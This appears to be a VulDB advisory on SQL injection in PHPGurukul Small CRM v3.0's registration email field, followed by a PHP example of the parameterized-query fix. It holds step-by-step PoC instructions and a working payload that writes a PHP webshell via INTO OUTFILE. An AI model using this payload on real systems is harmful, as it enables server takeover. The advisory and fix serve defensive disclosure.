Title | PHPGurukul Small CRM V 3.0 Remote Code Execution |
---|
Description | Vulnerability Description
The Registration page on Small CRM v3.0 is vulnerable to SQL injection, allowing unauthorized remote code execution (RCE) via the Outfile functionality of MySQL. This vulnerability arises from inadequate input validation in the email input field, coupled with the absence of parameterized queries.
Step by Step POC
1. Navigate to the registration page.
2. Fill out all the fields and intercept the request.
3. Send the intercepted request to the repeater.
4. Inject a SQL injection payload into the email field and observe that a webshell is written to the filesystem as a persistence mechanism.
5. Modify the payload to access the webshell on the server and utilize it to gain complete access to the web server.
6. Access the URL associated with the generated file, triggering a Remote Code Execution.
Payload for SQLI
'+AND+1337=1337+union+all+select+"<?php+echo+shell_exec($_GET['cmd']);?>"INTO+OUTFILE+'C:\\xampp\\htdocs\\webshell.php'#
Impact
The described vulnerability and proof of concept (PoC) pose severe risks, including unauthorized access, remote code execution (RCE), and system compromise.
Remediation
Implement strict input validation, use parameterized queries, and provide security training. |
---|
Source | ⚠️ https://github.com/nikhil-aniill/Small-CRM-CVE |
---|
User | nanilkumar.n8197 (ID 67373) |
---|
Submission | 09/04/2024 15:17 (30 days ago) |
---|
Moderation | 12/04/2024 09:03 (3 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 260480 |
---|
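
The Remediation entry above names strict input validation and parameterized queries. The following is an added example, not code from Small CRM or from the submitter, showing both in a registration handler. The `register_user` function, the `users` table and its columns, and the SQLite in-memory stand-in database are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical registration handler: table and column names are assumptions,
// not taken from Small CRM's source.
function register_user(PDO $db, string $name, string $email, string $password): bool
{
    // Strict input validation: reject anything that is not a syntactically valid address.
    $email = filter_var(trim($email), FILTER_VALIDATE_EMAIL);
    if ($email === false || strlen($email) > 254) {
        return false;
    }

    // Parameterized query: the SQL text is fixed and the values travel separately,
    // so quotes, UNION or INTO OUTFILE inside a value are never parsed as SQL.
    $stmt = $db->prepare(
        'INSERT INTO users (name, email, password_hash) VALUES (:name, :email, :hash)'
    );
    return $stmt->execute([
        ':name'  => $name,
        ':email' => $email,
        ':hash'  => password_hash($password, PASSWORD_DEFAULT),
    ]);
}

// Stand-in database so the example runs offline. Against MySQL the DSN would be
// 'mysql:host=...;dbname=...' with PDO::ATTR_EMULATE_PREPARES set to false.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT UNIQUE, password_hash TEXT)');

// Constructed sample inputs.
$samples = [
    'alice@example.com',          // ordinary address
    "o'brien@example.com",        // valid address that contains a quote
    "x' AND 1=1 UNION SELECT 1#", // injection-shaped input, not a valid address
];
foreach ($samples as $email) {
    $ok = register_user($db, 'Test User', $email, 'correct horse battery staple');
    printf("%-32s %s\n", $email, $ok ? 'stored' : 'rejected');
}

// Rows that were stored hold the submitted value as data; the query shape never changed.
foreach ($db->query('SELECT id, email FROM users') as $row) {
    printf("%d  %s\n", $row['id'], $row['email']);
}
```

The quote-bearing address passes validation, which is why validation alone does not replace the bound parameters. On the MySQL side, `INTO OUTFILE` also requires the database account to hold the `FILE` privilege and `secure_file_priv` to permit the target directory, so an application account without `FILE` cannot perform the file write described in the PoC.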